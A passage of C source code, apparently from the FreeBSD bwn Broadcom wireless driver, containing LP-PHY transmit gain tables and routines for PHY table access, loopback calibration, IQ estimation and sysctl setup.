15, 12, 0, 60 }, { 7, 15, 12, 0, 59 }, { 7, 15, 12, 0, 57 }, { 7, 15, 11, 0, 73 }, { 7, 15, 11, 0, 71 }, { 7, 15, 11, 0, 69 }, { 7, 15, 11, 0, 67 }, { 7, 15, 11, 0, 65 }, { 7, 15, 11, 0, 63 }, { 7, 15, 11, 0, 61 }, { 7, 15, 11, 0, 60 }, { 7, 15, 11, 0, 58 }, { 7, 15, 10, 0, 71 }, { 7, 15, 10, 0, 69 }, { 7, 15, 10, 0, 67 }, { 7, 15, 10, 0, 65 }, { 7, 15, 10, 0, 63 }, { 7, 15, 10, 0, 61 }, { 7, 15, 10, 0, 60 }, { 7, 15, 10, 0, 58 }, { 7, 15, 9, 0, 70 }, { 7, 15, 9, 0, 68 }, { 7, 15, 9, 0, 66 }, { 7, 15, 9, 0, 64 }, { 7, 15, 9, 0, 62 }, { 7, 15, 9, 0, 61 }, { 7, 15, 9, 0, 59 }, { 7, 15, 9, 0, 57 }, { 7, 15, 9, 0, 56 }, { 7, 14, 9, 0, 68 }, { 7, 14, 9, 0, 66 }, { 7, 14, 9, 0, 65 }, { 7, 14, 9, 0, 63 }, { 7, 14, 9, 0, 61 }, { 7, 14, 9, 0, 59 }, { 7, 14, 9, 0, 58 }, { 7, 13, 9, 0, 70 }, { 7, 13, 9, 0, 68 }, { 7, 13, 9, 0, 66 }, { 7, 13, 9, 0, 64 }, { 7, 13, 9, 0, 63 }, { 7, 13, 9, 0, 61 }, { 7, 13, 9, 0, 59 }, { 7, 13, 9, 0, 57 }, { 7, 13, 8, 0, 70 }, { 7, 13, 8, 0, 68 }, { 7, 13, 8, 0, 66 }, { 7, 13, 8, 0, 64 }, { 7, 13, 8, 0, 62 }, { 7, 13, 8, 0, 60 }, { 7, 13, 8, 0, 59 }, { 7, 13, 8, 0, 57 }, { 7, 12, 8, 0, 70 }, { 7, 12, 8, 0, 68 }, { 7, 12, 8, 0, 66 }, { 7, 12, 8, 0, 64 }, { 7, 12, 8, 0, 62 }, { 7, 12, 8, 0, 61 }, { 7, 12, 8, 0, 59 }, { 7, 12, 8, 0, 57 }, { 7, 12, 7, 0, 70 }, { 7, 12, 7, 0, 68 }, { 7, 12, 7, 0, 66 }, { 7, 12, 7, 0, 64 }, { 7, 12, 7, 0, 62 }, { 7, 12, 7, 0, 61 }, { 7, 12, 7, 0, 59 }, { 7, 12, 7, 0, 57 }, { 7, 11, 7, 0, 70 }, { 7, 11, 7, 0, 68 }, { 7, 11, 7, 0, 66 }, { 7, 11, 7, 0, 64 }, { 7, 11, 7, 0, 62 }, { 7, 11, 7, 0, 61 }, { 7, 11, 7, 0, 59 }, { 7, 11, 7, 0, 57 }, { 7, 11, 6, 0, 69 }, { 7, 11, 6, 0, 67 }, { 7, 11, 6, 0, 65 }, { 7, 11, 6, 0, 63 }, { 7, 11, 6, 0, 62 }, { 7, 11, 6, 0, 60 } }; static struct bwn_txgain_entry txgain_r1[] = { { 7, 15, 14, 0, 152 }, { 7, 15, 14, 0, 147 }, { 7, 15, 14, 0, 143 }, { 7, 15, 14, 0, 139 }, { 7, 15, 14, 0, 135 }, { 7, 15, 14, 0, 131 }, { 7, 15, 14, 0, 128 }, { 7, 15, 14, 0, 124 }, { 7, 15, 14, 0, 121 }, { 7, 15, 14, 0, 117 }, { 7, 15, 14, 0, 114 }, { 7, 15, 14, 0, 111 }, { 7, 15, 14, 0, 107 }, { 7, 15, 14, 0, 104 }, { 7, 15, 14, 0, 101 }, { 7, 15, 14, 0, 99 }, { 7, 15, 14, 0, 96 }, { 7, 15, 14, 0, 93 }, { 7, 15, 14, 0, 90 }, { 7, 15, 14, 0, 88 }, { 7, 15, 14, 0, 85 }, { 7, 15, 14, 0, 83 }, { 7, 15, 14, 0, 81 }, { 7, 15, 14, 0, 78 }, { 7, 15, 14, 0, 76 }, { 7, 15, 14, 0, 74 }, { 7, 15, 14, 0, 72 }, { 7, 15, 14, 0, 70 }, { 7, 15, 14, 0, 68 }, { 7, 15, 14, 0, 66 }, { 7, 15, 14, 0, 64 }, { 7, 15, 14, 0, 62 }, { 7, 15, 14, 0, 60 }, { 7, 15, 14, 0, 59 }, { 7, 15, 14, 0, 57 }, { 7, 15, 13, 0, 72 }, { 7, 15, 13, 0, 70 }, { 7, 15, 14, 0, 68 }, { 7, 15, 14, 0, 66 }, { 7, 15, 14, 0, 64 }, { 7, 15, 14, 0, 62 }, { 7, 15, 14, 0, 60 }, { 7, 15, 14, 0, 59 }, { 7, 15, 14, 0, 57 }, { 7, 15, 13, 0, 72 }, { 7, 15, 13, 0, 70 }, { 7, 15, 13, 0, 68 }, { 7, 15, 13, 0, 66 }, { 7, 15, 13, 0, 64 }, { 7, 15, 13, 0, 62 }, { 7, 15, 13, 0, 60 }, { 7, 15, 13, 0, 59 }, { 7, 15, 13, 0, 57 }, { 7, 15, 12, 0, 71 }, { 7, 15, 12, 0, 69 }, { 7, 15, 12, 0, 67 }, { 7, 15, 12, 0, 65 }, { 7, 15, 12, 0, 63 }, { 7, 15, 12, 0, 62 }, { 7, 15, 12, 0, 60 }, { 7, 15, 12, 0, 58 }, { 7, 15, 12, 0, 57 }, { 7, 15, 11, 0, 70 }, { 7, 15, 11, 0, 68 }, { 7, 15, 11, 0, 66 }, { 7, 15, 11, 0, 65 }, { 7, 15, 11, 0, 63 }, { 7, 15, 11, 0, 61 }, { 7, 15, 11, 0, 59 }, { 7, 15, 11, 0, 58 }, { 7, 15, 10, 0, 71 }, { 7, 15, 10, 0, 69 }, { 7, 15, 10, 0, 67 }, { 7, 15, 10, 0, 65 }, { 7, 15, 10, 0, 63 }, { 7, 15, 10, 0, 61 }, { 7, 15, 10, 0, 60 }, { 7, 15, 10, 0, 58 }, { 7, 15, 10, 0, 56 }, { 7, 15, 9, 0, 70 }, { 7, 15, 9, 0, 68 }, { 7, 15, 9, 0, 66 }, { 7, 15, 9, 0, 64 }, { 7, 15, 9, 0, 62 }, { 7, 15, 9, 0, 60 }, { 7, 15, 9, 0, 59 }, { 7, 14, 9, 0, 72 }, { 7, 14, 9, 0, 70 }, { 7, 14, 9, 0, 68 }, { 7, 14, 9, 0, 66 }, { 7, 14, 9, 0, 64 }, { 7, 14, 9, 0, 62 }, { 7, 14, 9, 0, 60 }, { 7, 14, 9, 0, 59 }, { 7, 13, 9, 0, 72 }, { 7, 13, 9, 0, 70 }, { 7, 13, 9, 0, 68 }, { 7, 13, 9, 0, 66 }, { 7, 13, 9, 0, 64 }, { 7, 13, 9, 0, 63 }, { 7, 13, 9, 0, 61 }, { 7, 13, 9, 0, 59 }, { 7, 13, 9, 0, 57 }, { 7, 13, 8, 0, 72 }, { 7, 13, 8, 0, 70 }, { 7, 13, 8, 0, 68 }, { 7, 13, 8, 0, 66 }, { 7, 13, 8, 0, 64 }, { 7, 13, 8, 0, 62 }, { 7, 13, 8, 0, 60 }, { 7, 13, 8, 0, 59 }, { 7, 12, 8, 0, 72 }, { 7, 12, 8, 0, 70 }, { 7, 12, 8, 0, 68 }, { 7, 12, 8, 0, 66 }, { 7, 12, 8, 0, 64 }, { 7, 12, 8, 0, 62 }, { 7, 12, 8, 0, 61 }, { 7, 12, 8, 0, 59 }, { 7, 12, 7, 0, 73 }, { 7, 12, 7, 0, 71 }, { 7, 12, 7, 0, 69 }, { 7, 12, 7, 0, 67 }, { 7, 12, 7, 0, 65 }, { 7, 12, 7, 0, 63 }, { 7, 12, 7, 0, 61 }, { 7, 12, 7, 0, 59 }, { 7, 11, 7, 0, 72 }, { 7, 11, 7, 0, 70 }, { 7, 11, 7, 0, 68 }, { 7, 11, 7, 0, 66 }, { 7, 11, 7, 0, 65 }, { 7, 11, 7, 0, 63 }, { 7, 11, 7, 0, 61 }, { 7, 11, 7, 0, 59 }, { 7, 11, 6, 0, 73 }, { 7, 11, 6, 0, 71 } }; static struct bwn_txgain_entry txgain_2ghz_r1[] = { { 4, 15, 15, 0, 90 }, { 4, 15, 15, 0, 88 }, { 4, 15, 15, 0, 85 }, { 4, 15, 15, 0, 83 }, { 4, 15, 15, 0, 81 }, { 4, 15, 15, 0, 78 }, { 4, 15, 15, 0, 76 }, { 4, 15, 15, 0, 74 }, { 4, 15, 15, 0, 72 }, { 4, 15, 15, 0, 70 }, { 4, 15, 15, 0, 68 }, { 4, 15, 15, 0, 66 }, { 4, 15, 15, 0, 64 }, { 4, 15, 15, 0, 62 }, { 4, 15, 15, 0, 60 }, { 4, 15, 15, 0, 59 }, { 4, 15, 14, 0, 72 }, { 4, 15, 14, 0, 70 }, { 4, 15, 14, 0, 68 }, { 4, 15, 14, 0, 66 }, { 4, 15, 14, 0, 64 }, { 4, 15, 14, 0, 62 }, { 4, 15, 14, 0, 60 }, { 4, 15, 14, 0, 59 }, { 4, 15, 13, 0, 72 }, { 4, 15, 13, 0, 70 }, { 4, 15, 13, 0, 68 }, { 4, 15, 13, 0, 66 }, { 4, 15, 13, 0, 64 }, { 4, 15, 13, 0, 62 }, { 4, 15, 13, 0, 60 }, { 4, 15, 13, 0, 59 }, { 4, 15, 12, 0, 72 }, { 4, 15, 12, 0, 70 }, { 4, 15, 12, 0, 68 }, { 4, 15, 12, 0, 66 }, { 4, 15, 12, 0, 64 }, { 4, 15, 12, 0, 62 }, { 4, 15, 12, 0, 60 }, { 4, 15, 12, 0, 59 }, { 4, 15, 11, 0, 72 }, { 4, 15, 11, 0, 70 }, { 4, 15, 11, 0, 68 }, { 4, 15, 11, 0, 66 }, { 4, 15, 11, 0, 64 }, { 4, 15, 11, 0, 62 }, { 4, 15, 11, 0, 60 }, { 4, 15, 11, 0, 59 }, { 4, 15, 10, 0, 72 }, { 4, 15, 10, 0, 70 }, { 4, 15, 10, 0, 68 }, { 4, 15, 10, 0, 66 }, { 4, 15, 10, 0, 64 }, { 4, 15, 10, 0, 62 }, { 4, 15, 10, 0, 60 }, { 4, 15, 10, 0, 59 }, { 4, 15, 9, 0, 72 }, { 4, 15, 9, 0, 70 }, { 4, 15, 9, 0, 68 }, { 4, 15, 9, 0, 66 }, { 4, 15, 9, 0, 64 }, { 4, 15, 9, 0, 62 }, { 4, 15, 9, 0, 60 }, { 4, 15, 9, 0, 59 }, { 4, 14, 9, 0, 72 }, { 4, 14, 9, 0, 70 }, { 4, 14, 9, 0, 68 }, { 4, 14, 9, 0, 66 }, { 4, 14, 9, 0, 64 }, { 4, 14, 9, 0, 62 }, { 4, 14, 9, 0, 60 }, { 4, 14, 9, 0, 59 }, { 4, 13, 9, 0, 72 }, { 4, 13, 9, 0, 70 }, { 4, 13, 9, 0, 68 }, { 4, 13, 9, 0, 66 }, { 4, 13, 9, 0, 64 }, { 4, 13, 9, 0, 63 }, { 4, 13, 9, 0, 61 }, { 4, 13, 9, 0, 59 }, { 4, 13, 9, 0, 57 }, { 4, 13, 8, 0, 72 }, { 4, 13, 8, 0, 70 }, { 4, 13, 8, 0, 68 }, { 4, 13, 8, 0, 66 }, { 4, 13, 8, 0, 64 }, { 4, 13, 8, 0, 62 }, { 4, 13, 8, 0, 60 }, { 4, 13, 8, 0, 59 }, { 4, 12, 8, 0, 72 }, { 4, 12, 8, 0, 70 }, { 4, 12, 8, 0, 68 }, { 4, 12, 8, 0, 66 }, { 4, 12, 8, 0, 64 }, { 4, 12, 8, 0, 62 }, { 4, 12, 8, 0, 61 }, { 4, 12, 8, 0, 59 }, { 4, 12, 7, 0, 73 }, { 4, 12, 7, 0, 71 }, { 4, 12, 7, 0, 69 }, { 4, 12, 7, 0, 67 }, { 4, 12, 7, 0, 65 }, { 4, 12, 7, 0, 63 }, { 4, 12, 7, 0, 61 }, { 4, 12, 7, 0, 59 }, { 4, 11, 7, 0, 72 }, { 4, 11, 7, 0, 70 }, { 4, 11, 7, 0, 68 }, { 4, 11, 7, 0, 66 }, { 4, 11, 7, 0, 65 }, { 4, 11, 7, 0, 63 }, { 4, 11, 7, 0, 61 }, { 4, 11, 7, 0, 59 }, { 4, 11, 6, 0, 73 }, { 4, 11, 6, 0, 71 }, { 4, 11, 6, 0, 69 }, { 4, 11, 6, 0, 67 }, { 4, 11, 6, 0, 65 }, { 4, 11, 6, 0, 63 }, { 4, 11, 6, 0, 61 }, { 4, 11, 6, 0, 60 }, { 4, 10, 6, 0, 72 }, { 4, 10, 6, 0, 70 }, { 4, 10, 6, 0, 68 }, { 4, 10, 6, 0, 66 }, { 4, 10, 6, 0, 64 }, { 4, 10, 6, 0, 62 }, { 4, 10, 6, 0, 60 } }; static struct bwn_txgain_entry txgain_5ghz_r1[] = { { 7, 15, 15, 0, 99 }, { 7, 15, 15, 0, 96 }, { 7, 15, 15, 0, 93 }, { 7, 15, 15, 0, 90 }, { 7, 15, 15, 0, 88 }, { 7, 15, 15, 0, 85 }, { 7, 15, 15, 0, 83 }, { 7, 15, 15, 0, 81 }, { 7, 15, 15, 0, 78 }, { 7, 15, 15, 0, 76 }, { 7, 15, 15, 0, 74 }, { 7, 15, 15, 0, 72 }, { 7, 15, 15, 0, 70 }, { 7, 15, 15, 0, 68 }, { 7, 15, 15, 0, 66 }, { 7, 15, 15, 0, 64 }, { 7, 15, 15, 0, 62 }, { 7, 15, 15, 0, 60 }, { 7, 15, 15, 0, 59 }, { 7, 15, 15, 0, 57 }, { 7, 15, 15, 0, 55 }, { 7, 15, 14, 0, 72 }, { 7, 15, 14, 0, 70 }, { 7, 15, 14, 0, 68 }, { 7, 15, 14, 0, 66 }, { 7, 15, 14, 0, 64 }, { 7, 15, 14, 0, 62 }, { 7, 15, 14, 0, 60 }, { 7, 15, 14, 0, 58 }, { 7, 15, 14, 0, 56 }, { 7, 15, 14, 0, 55 }, { 7, 15, 13, 0, 71 }, { 7, 15, 13, 0, 69 }, { 7, 15, 13, 0, 67 }, { 7, 15, 13, 0, 65 }, { 7, 15, 13, 0, 63 }, { 7, 15, 13, 0, 62 }, { 7, 15, 13, 0, 60 }, { 7, 15, 13, 0, 58 }, { 7, 15, 13, 0, 56 }, { 7, 15, 12, 0, 72 }, { 7, 15, 12, 0, 70 }, { 7, 15, 12, 0, 68 }, { 7, 15, 12, 0, 66 }, { 7, 15, 12, 0, 64 }, { 7, 15, 12, 0, 62 }, { 7, 15, 12, 0, 60 }, { 7, 15, 12, 0, 59 }, { 7, 15, 12, 0, 57 }, { 7, 15, 11, 0, 73 }, { 7, 15, 11, 0, 71 }, { 7, 15, 11, 0, 69 }, { 7, 15, 11, 0, 67 }, { 7, 15, 11, 0, 65 }, { 7, 15, 11, 0, 63 }, { 7, 15, 11, 0, 61 }, { 7, 15, 11, 0, 60 }, { 7, 15, 11, 0, 58 }, { 7, 15, 10, 0, 71 }, { 7, 15, 10, 0, 69 }, { 7, 15, 10, 0, 67 }, { 7, 15, 10, 0, 65 }, { 7, 15, 10, 0, 63 }, { 7, 15, 10, 0, 61 }, { 7, 15, 10, 0, 60 }, { 7, 15, 10, 0, 58 }, { 7, 15, 9, 0, 70 }, { 7, 15, 9, 0, 68 }, { 7, 15, 9, 0, 66 }, { 7, 15, 9, 0, 64 }, { 7, 15, 9, 0, 62 }, { 7, 15, 9, 0, 61 }, { 7, 15, 9, 0, 59 }, { 7, 15, 9, 0, 57 }, { 7, 15, 9, 0, 56 }, { 7, 14, 9, 0, 68 }, { 7, 14, 9, 0, 66 }, { 7, 14, 9, 0, 65 }, { 7, 14, 9, 0, 63 }, { 7, 14, 9, 0, 61 }, { 7, 14, 9, 0, 59 }, { 7, 14, 9, 0, 58 }, { 7, 13, 9, 0, 70 }, { 7, 13, 9, 0, 68 }, { 7, 13, 9, 0, 66 }, { 7, 13, 9, 0, 64 }, { 7, 13, 9, 0, 63 }, { 7, 13, 9, 0, 61 }, { 7, 13, 9, 0, 59 }, { 7, 13, 9, 0, 57 }, { 7, 13, 8, 0, 70 }, { 7, 13, 8, 0, 68 }, { 7, 13, 8, 0, 66 }, { 7, 13, 8, 0, 64 }, { 7, 13, 8, 0, 62 }, { 7, 13, 8, 0, 60 }, { 7, 13, 8, 0, 59 }, { 7, 13, 8, 0, 57 }, { 7, 12, 8, 0, 70 }, { 7, 12, 8, 0, 68 }, { 7, 12, 8, 0, 66 }, { 7, 12, 8, 0, 64 }, { 7, 12, 8, 0, 62 }, { 7, 12, 8, 0, 61 }, { 7, 12, 8, 0, 59 }, { 7, 12, 8, 0, 57 }, { 7, 12, 7, 0, 70 }, { 7, 12, 7, 0, 68 }, { 7, 12, 7, 0, 66 }, { 7, 12, 7, 0, 64 }, { 7, 12, 7, 0, 62 }, { 7, 12, 7, 0, 61 }, { 7, 12, 7, 0, 59 }, { 7, 12, 7, 0, 57 }, { 7, 11, 7, 0, 70 }, { 7, 11, 7, 0, 68 }, { 7, 11, 7, 0, 66 }, { 7, 11, 7, 0, 64 }, { 7, 11, 7, 0, 62 }, { 7, 11, 7, 0, 61 }, { 7, 11, 7, 0, 59 }, { 7, 11, 7, 0, 57 }, { 7, 11, 6, 0, 69 }, { 7, 11, 6, 0, 67 }, { 7, 11, 6, 0, 65 }, { 7, 11, 6, 0, 63 }, { 7, 11, 6, 0, 62 }, { 7, 11, 6, 0, 60 } }; if (mac->mac_phy.rev != 0 && mac->mac_phy.rev != 1) { if (siba_sprom_get_bf_hi(sc->sc_dev) & BWN_BFH_NOPA) bwn_phy_lp_gaintbl_write_multi(mac, 0, 128, txgain_r2); else if (IEEE80211_IS_CHAN_2GHZ(ic->ic_curchan)) bwn_phy_lp_gaintbl_write_multi(mac, 0, 128, txgain_2ghz_r2); else bwn_phy_lp_gaintbl_write_multi(mac, 0, 128, txgain_5ghz_r2); return; } if (mac->mac_phy.rev == 0) { if ((siba_sprom_get_bf_hi(sc->sc_dev) & BWN_BFH_NOPA) || (siba_sprom_get_bf_lo(sc->sc_dev) & BWN_BFL_HGPA)) bwn_phy_lp_gaintbl_write_multi(mac, 0, 128, txgain_r0); else if (IEEE80211_IS_CHAN_2GHZ(ic->ic_curchan)) bwn_phy_lp_gaintbl_write_multi(mac, 0, 128, txgain_2ghz_r0); else bwn_phy_lp_gaintbl_write_multi(mac, 0, 128, txgain_5ghz_r0); return; } if ((siba_sprom_get_bf_hi(sc->sc_dev) & BWN_BFH_NOPA) || (siba_sprom_get_bf_lo(sc->sc_dev) & BWN_BFL_HGPA)) bwn_phy_lp_gaintbl_write_multi(mac, 0, 128, txgain_r1); else if (IEEE80211_IS_CHAN_2GHZ(ic->ic_curchan)) bwn_phy_lp_gaintbl_write_multi(mac, 0, 128, txgain_2ghz_r1); else bwn_phy_lp_gaintbl_write_multi(mac, 0, 128, txgain_5ghz_r1); } static void bwn_tab_write(struct bwn_mac *mac, uint32_t typeoffset, uint32_t value) { uint32_t offset, type; type = BWN_TAB_GETTYPE(typeoffset); offset = BWN_TAB_GETOFFSET(typeoffset); KASSERT(offset <= 0xffff, ("%s:%d: fail", __func__, __LINE__)); switch (type) { case BWN_TAB_8BIT: KASSERT(!(value & ~0xff), ("%s:%d: fail", __func__, __LINE__)); BWN_PHY_WRITE(mac, BWN_PHY_TABLE_ADDR, offset); BWN_PHY_WRITE(mac, BWN_PHY_TABLEDATALO, value); break; case BWN_TAB_16BIT: KASSERT(!(value & ~0xffff), ("%s:%d: fail", __func__, __LINE__)); BWN_PHY_WRITE(mac, BWN_PHY_TABLE_ADDR, offset); BWN_PHY_WRITE(mac, BWN_PHY_TABLEDATALO, value); break; case BWN_TAB_32BIT: BWN_PHY_WRITE(mac, BWN_PHY_TABLE_ADDR, offset); BWN_PHY_WRITE(mac, BWN_PHY_TABLEDATAHI, value >> 16); BWN_PHY_WRITE(mac, BWN_PHY_TABLEDATALO, value); break; default: KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); } } static int bwn_phy_lp_loopback(struct bwn_mac *mac) { struct bwn_phy_lp_iq_est ie; int i, index = -1; uint32_t tmp; memset(&ie, 0, sizeof(ie)); bwn_phy_lp_set_trsw_over(mac, 1, 1); BWN_PHY_SET(mac, BWN_PHY_AFE_CTL_OVR, 1); BWN_PHY_MASK(mac, BWN_PHY_AFE_CTL_OVRVAL, 0xfffe); BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_0, 0x800); BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_VAL_0, 0x800); BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_0, 0x8); BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_VAL_0, 0x8); BWN_RF_WRITE(mac, BWN_B2062_N_TXCTL_A, 0x80); BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_0, 0x80); BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_VAL_0, 0x80); for (i = 0; i < 32; i++) { bwn_phy_lp_set_rxgain_idx(mac, i); bwn_phy_lp_ddfs_turnon(mac, 1, 1, 5, 5, 0); if (!(bwn_phy_lp_rx_iq_est(mac, 1000, 32, &ie))) continue; tmp = (ie.ie_ipwr + ie.ie_qpwr) / 1000; if ((tmp > 4000) && (tmp < 10000)) { index = i; break; } } bwn_phy_lp_ddfs_turnoff(mac); return (index); } static void bwn_phy_lp_set_rxgain_idx(struct bwn_mac *mac, uint16_t idx) { bwn_phy_lp_set_rxgain(mac, bwn_tab_read(mac, BWN_TAB_2(12, idx))); } static void bwn_phy_lp_ddfs_turnon(struct bwn_mac *mac, int i_on, int q_on, int incr1, int incr2, int scale_idx) { bwn_phy_lp_ddfs_turnoff(mac); BWN_PHY_MASK(mac, BWN_PHY_AFE_DDFS_POINTER_INIT, 0xff80); BWN_PHY_MASK(mac, BWN_PHY_AFE_DDFS_POINTER_INIT, 0x80ff); BWN_PHY_SETMASK(mac, BWN_PHY_AFE_DDFS_INCR_INIT, 0xff80, incr1); BWN_PHY_SETMASK(mac, BWN_PHY_AFE_DDFS_INCR_INIT, 0x80ff, incr2 << 8); BWN_PHY_SETMASK(mac, BWN_PHY_AFE_DDFS, 0xfff7, i_on << 3); BWN_PHY_SETMASK(mac, BWN_PHY_AFE_DDFS, 0xffef, q_on << 4); BWN_PHY_SETMASK(mac, BWN_PHY_AFE_DDFS, 0xff9f, scale_idx << 5); BWN_PHY_MASK(mac, BWN_PHY_AFE_DDFS, 0xfffb); BWN_PHY_SET(mac, BWN_PHY_AFE_DDFS, 0x2); BWN_PHY_SET(mac, BWN_PHY_LP_PHY_CTL, 0x20); } static uint8_t bwn_phy_lp_rx_iq_est(struct bwn_mac *mac, uint16_t sample, uint8_t time, struct bwn_phy_lp_iq_est *ie) { int i; BWN_PHY_MASK(mac, BWN_PHY_CRSGAIN_CTL, 0xfff7); BWN_PHY_WRITE(mac, BWN_PHY_IQ_NUM_SMPLS_ADDR, sample); BWN_PHY_SETMASK(mac, BWN_PHY_IQ_ENABLE_WAIT_TIME_ADDR, 0xff00, time); BWN_PHY_MASK(mac, BWN_PHY_IQ_ENABLE_WAIT_TIME_ADDR, 0xfeff); BWN_PHY_SET(mac, BWN_PHY_IQ_ENABLE_WAIT_TIME_ADDR, 0x200); for (i = 0; i < 500; i++) { if (!(BWN_PHY_READ(mac, BWN_PHY_IQ_ENABLE_WAIT_TIME_ADDR) & 0x200)) break; DELAY(1000); } if ((BWN_PHY_READ(mac, BWN_PHY_IQ_ENABLE_WAIT_TIME_ADDR) & 0x200)) { BWN_PHY_SET(mac, BWN_PHY_CRSGAIN_CTL, 0x8); return 0; } ie->ie_iqprod = BWN_PHY_READ(mac, BWN_PHY_IQ_ACC_HI_ADDR); ie->ie_iqprod <<= 16; ie->ie_iqprod |= BWN_PHY_READ(mac, BWN_PHY_IQ_ACC_LO_ADDR); ie->ie_ipwr = BWN_PHY_READ(mac, BWN_PHY_IQ_I_PWR_ACC_HI_ADDR); ie->ie_ipwr <<= 16; ie->ie_ipwr |= BWN_PHY_READ(mac, BWN_PHY_IQ_I_PWR_ACC_LO_ADDR); ie->ie_qpwr = BWN_PHY_READ(mac, BWN_PHY_IQ_Q_PWR_ACC_HI_ADDR); ie->ie_qpwr <<= 16; ie->ie_qpwr |= BWN_PHY_READ(mac, BWN_PHY_IQ_Q_PWR_ACC_LO_ADDR); BWN_PHY_SET(mac, BWN_PHY_CRSGAIN_CTL, 0x8); return 1; } static uint32_t bwn_tab_read(struct bwn_mac *mac, uint32_t typeoffset) { uint32_t offset, type, value; type = BWN_TAB_GETTYPE(typeoffset); offset = BWN_TAB_GETOFFSET(typeoffset); KASSERT(offset <= 0xffff, ("%s:%d: fail", __func__, __LINE__)); switch (type) { case BWN_TAB_8BIT: BWN_PHY_WRITE(mac, BWN_PHY_TABLE_ADDR, offset); value = BWN_PHY_READ(mac, BWN_PHY_TABLEDATALO) & 0xff; break; case BWN_TAB_16BIT: BWN_PHY_WRITE(mac, BWN_PHY_TABLE_ADDR, offset); value = BWN_PHY_READ(mac, BWN_PHY_TABLEDATALO); break; case BWN_TAB_32BIT: BWN_PHY_WRITE(mac, BWN_PHY_TABLE_ADDR, offset); value = BWN_PHY_READ(mac, BWN_PHY_TABLEDATAHI); value <<= 16; value |= BWN_PHY_READ(mac, BWN_PHY_TABLEDATALO); break; default: KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); value = 0; } return (value); } static void bwn_phy_lp_ddfs_turnoff(struct bwn_mac *mac) { BWN_PHY_MASK(mac, BWN_PHY_AFE_DDFS, 0xfffd); BWN_PHY_MASK(mac, BWN_PHY_LP_PHY_CTL, 0xffdf); } static void bwn_phy_lp_set_txgain_dac(struct bwn_mac *mac, uint16_t dac) { uint16_t ctl; ctl = BWN_PHY_READ(mac, BWN_PHY_AFE_DAC_CTL) & 0xc7f; ctl |= dac << 7; BWN_PHY_SETMASK(mac, BWN_PHY_AFE_DAC_CTL, 0xf000, ctl); } static void bwn_phy_lp_set_txgain_pa(struct bwn_mac *mac, uint16_t gain) { BWN_PHY_SETMASK(mac, BWN_PHY_OFDM(0xfb), 0xe03f, gain << 6); BWN_PHY_SETMASK(mac, BWN_PHY_OFDM(0xfd), 0x80ff, gain << 8); } static void bwn_phy_lp_set_txgain_override(struct bwn_mac *mac) { if (mac->mac_phy.rev < 2) BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_2, 0x100); else { BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_2, 0x80); BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_2, 0x4000); } BWN_PHY_SET(mac, BWN_PHY_AFE_CTL_OVR, 0x40); } static uint16_t bwn_phy_lp_get_pa_gain(struct bwn_mac *mac) { return BWN_PHY_READ(mac, BWN_PHY_OFDM(0xfb)) & 0x7f; } static uint8_t bwn_nbits(int32_t val) { uint32_t tmp; uint8_t nbits = 0; for (tmp = abs(val); tmp != 0; tmp >>= 1) nbits++; return (nbits); } static void bwn_phy_lp_gaintbl_write_multi(struct bwn_mac *mac, int offset, int count, struct bwn_txgain_entry *table) { int i; for (i = offset; i < count; i++) bwn_phy_lp_gaintbl_write(mac, i, table[i]); } static void bwn_phy_lp_gaintbl_write(struct bwn_mac *mac, int offset, struct bwn_txgain_entry data) { if (mac->mac_phy.rev >= 2) bwn_phy_lp_gaintbl_write_r2(mac, offset, data); else bwn_phy_lp_gaintbl_write_r01(mac, offset, data); } static void bwn_phy_lp_gaintbl_write_r2(struct bwn_mac *mac, int offset, struct bwn_txgain_entry te) { struct bwn_softc *sc = mac->mac_sc; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint32_t tmp; KASSERT(mac->mac_phy.rev >= 2, ("%s:%d: fail", __func__, __LINE__)); tmp = (te.te_pad << 16) | (te.te_pga << 8) | te.te_gm; if (mac->mac_phy.rev >= 3) { tmp |= ((IEEE80211_IS_CHAN_5GHZ(ic->ic_curchan)) ? (0x10 << 24) : (0x70 << 24)); } else { tmp |= ((IEEE80211_IS_CHAN_5GHZ(ic->ic_curchan)) ? (0x14 << 24) : (0x7f << 24)); } bwn_tab_write(mac, BWN_TAB_4(7, 0xc0 + offset), tmp); bwn_tab_write(mac, BWN_TAB_4(7, 0x140 + offset), te.te_bbmult << 20 | te.te_dac << 28); } static void bwn_phy_lp_gaintbl_write_r01(struct bwn_mac *mac, int offset, struct bwn_txgain_entry te) { KASSERT(mac->mac_phy.rev < 2, ("%s:%d: fail", __func__, __LINE__)); bwn_tab_write(mac, BWN_TAB_4(10, 0xc0 + offset), (te.te_pad << 11) | (te.te_pga << 7) | (te.te_gm << 4) | te.te_dac); bwn_tab_write(mac, BWN_TAB_4(10, 0x140 + offset), te.te_bbmult << 20); } static void bwn_sysctl_node(struct bwn_softc *sc) { device_t dev = sc->sc_dev; struct bwn_mac *mac; struct bwn_stats *stats; /* XXX assume that count of MAC is only 1. */ if ((mac = sc->sc_curmac) == NULL) return; stats = &mac->mac_stats; SYSCTL_ADD_INT(device_get_sysctl_ctx(dev), SYSCTL_CHILDREN(device_get_sysctl_tree(dev)), OID_AUTO, "linknoise", CTLFLAG_RW, &stats->rts, 0, "Noise level"); SYSCTL_ADD_INT(device_get_sysctl_ctx(dev), SYSCTL_CHILDREN(device_get_sysctl_tree(dev)), OID_AUTO, "rts", CTLFLAG_RW, &stats->rts, 0, "RTS"); SYSCTL_ADD_INT(device_get_sysctl_ctx(dev), SYSCTL_CHILDREN(device_get_sysctl_tree(dev)), OID_AUTO, "rtsfail", CTLFLAG_RW, &stats->rtsfail, 0, "RTS failed to send"); #ifdef BWN_DEBUG SYSCTL_ADD_UINT(device_get_sysctl_ctx(dev), SYSCTL_CHILDREN(device_get_sysctl_tree(dev)), OID_AUTO, "debug", CTLFLAG_RW, &sc->sc_debug, 0, "Debug flags"); #endif } static device_method_t bwn_methods[] = { /* Device interface */ DEVMETHOD(device_probe, bwn_probe), DEVMETHOD(device_attach, bwn_attach), DEVMETHOD(device_detach, 